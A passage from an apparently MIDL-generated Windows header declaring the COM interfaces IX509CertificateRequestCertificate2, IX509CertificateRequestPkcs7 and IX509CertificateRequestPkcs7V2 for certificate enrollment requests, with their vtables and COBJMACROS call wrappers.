#define IX509CertificateRequestCertificate2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCertificate2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCertificate2_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate2_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate2_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCertificate2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCertificate2_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestCertificate2_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestCertificate2_CheckPublicKeySignature(This,pPublicKey)	\
    ( (This)->lpVtbl -> CheckPublicKeySignature(This,pPublicKey) ) 

#define IX509CertificateRequestCertificate2_get_Issuer(This,ppValue)	\
    ( (This)->lpVtbl -> get_Issuer(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_Issuer(This,pValue)	\
    ( (This)->lpVtbl -> put_Issuer(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_NotBefore(This,pValue)	\
    ( (This)->lpVtbl -> get_NotBefore(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_NotBefore(This,Value)	\
    ( (This)->lpVtbl -> put_NotBefore(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_NotAfter(This,pValue)	\
    ( (This)->lpVtbl -> get_NotAfter(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_NotAfter(This,Value)	\
    ( (This)->lpVtbl -> put_NotAfter(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_SerialNumber(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SerialNumber(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_put_SerialNumber(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SerialNumber(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestCertificate2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCertificate2_InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCertificate2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestCertificate2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCertificate2_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs7_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs7 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs7;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab344-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs7 : public IX509CertificateRequest
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplateName( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions = InheritDefault) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromInnerRequest( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_RequesterName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_RequesterName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_SignerCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs7Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs7 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs7Vtbl;

    interface IX509CertificateRequestPkcs7
    {
        CONST_VTBL struct IX509CertificateRequestPkcs7Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs7_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs7_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs7_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs7_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs7_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs7_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs7_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs7_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs7_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs7_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs7_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs7_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs7_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs7_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs7_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs7_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs7_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs7_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs7_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestPkcs7_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs7_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestPkcs7_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs7_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7V2_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs7V2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs7V2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs7V2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35c-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs7V2 : public IX509CertificateRequestPkcs7
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckCertificateSignature( 
            /* [in] */ VARIANT_BOOL ValidateCertificateChain) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs7V2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs7V2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
